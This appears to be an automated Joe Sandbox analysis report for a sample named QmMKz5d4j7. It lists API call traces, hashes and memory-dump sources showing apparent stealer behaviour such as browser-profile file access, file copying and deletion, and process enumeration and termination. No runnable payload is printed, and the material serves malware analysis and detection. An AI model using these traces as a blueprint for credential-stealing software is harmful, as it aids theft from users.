                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction ID: b6c79350879f92eb4bb8617f3476c8bb7e2aa6d8e1f8e73475853970a2f51dcd
                                      • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                      • Instruction Fuzzy Hash: 75E1BD729203189BCF19EBE4DD91DEEB33AAF64300F908159E157B2194EF346A48DF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
                                      • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                      • Opcode Fuzzy Hash: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
                                      • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD6E8
                                      • lstrlen.KERNEL32(00000000), ref: 022DD8FF
                                      • lstrlen.KERNEL32(00000000), ref: 022DD913
                                      • DeleteFileA.KERNEL32(00000000), ref: 022DD992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction ID: 1b38d02df0154e398d0f8ec03b1e638ba83fe65b8f900dc65c0bee5badce6b20
                                      • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction Fuzzy Hash: FD91CB72920318ABCF18EBE4DD95DFE733AAF64300F904169E507A6194EF346A48DF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
                                      • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                      • Opcode Fuzzy Hash: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
                                      • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DDA68
                                      • lstrlen.KERNEL32(00000000), ref: 022DDC06
                                      • lstrlen.KERNEL32(00000000), ref: 022DDC1A
                                      • DeleteFileA.KERNEL32(00000000), ref: 022DDC99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction ID: 626f399f4d31656a7ebd68aae58d7b6b7cbd2d2cd3e1c2ec287d66d2709a4b82
                                      • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction Fuzzy Hash: 8F81CA72920318ABCF08EBE4DD95DEE733AAF64300F90456DE107A6194EF346A48DF61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                      • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
                                      • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                      • Opcode Fuzzy Hash: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
                                      • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                      APIs
                                      • memset.MSVCRT ref: 004194EB
                                        • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                        • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                        • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                      • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 396451647-0
                                      • Opcode ID: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
                                      • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                      • Opcode Fuzzy Hash: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
                                      • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                      APIs
                                      • memset.MSVCRT ref: 022E9752
                                        • Part of subcall function 022E8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022E9785,00000000), ref: 022E8FC2
                                        • Part of subcall function 022E8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E8FC9
                                        • Part of subcall function 022E8FB7: wsprintfW.USER32 ref: 022E8FDF
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022E9812
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 022E9830
                                      • CloseHandle.KERNEL32(00000000), ref: 022E983D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction ID: 1966fd507f57be01be1918eb8ca97169c2c0f1f91db8edbb69edd4c07ebe01c6
                                      • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction Fuzzy Hash: 843148B5E10248AFDF14DFE0CC49BEDB779EB45300F904419E506AA288DB786A88DF52
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                      • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • CloseHandle.KERNEL32(?), ref: 00418761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
                                      • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                      • Opcode Fuzzy Hash: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
                                      • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022E8931
                                      • Process32First.KERNEL32(?,00000128), ref: 022E8945
                                      • Process32Next.KERNEL32(?,00000128), ref: 022E895A
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • CloseHandle.KERNEL32(?), ref: 022E89C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction ID: 2b16b41d357271d2a048d5525aa5b60bff6fcd18246f052aa8a17739eb6b0277
                                      • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction Fuzzy Hash: 07318C71911318EBCF24DF94CD84FEEB379EB55700F504199A10AA22A4DB346E84CFA1
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                      • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                      • lstrcatA.KERNEL32(?,0068FE70), ref: 00414FAB
                                      • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
                                      • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                      • Opcode Fuzzy Hash: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
                                      • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                      • wsprintfA.USER32 ref: 00418850
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 2716131235-2206825331
                                      • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                      • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID:
                                      • API String ID: 3407564107-0
                                      • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction ID: dada6b9641bc4c403908fecdb169cc63010fb239e5ee0ba82f92f2f6832552a2
                                      • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction Fuzzy Hash: A41149B4910209EFCF04DFE4D948AEDBB75FF04305F408469E80AA6250E7705B14DF65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                      • wsprintfA.USER32 ref: 004179F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 1243822799-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022E7C17
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E7C1E
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022E7C2B
                                      • wsprintfA.USER32 ref: 022E7C5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 7ab8456280568004345be6c728328476938821766eb4fb1773edd4f3bdf85d72
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: 101139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF606A2280D3795940CBB1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022E7CCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E7CD1
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022E7CE4
                                      • wsprintfA.USER32 ref: 022E7D1E
                                      Memory Dump Source
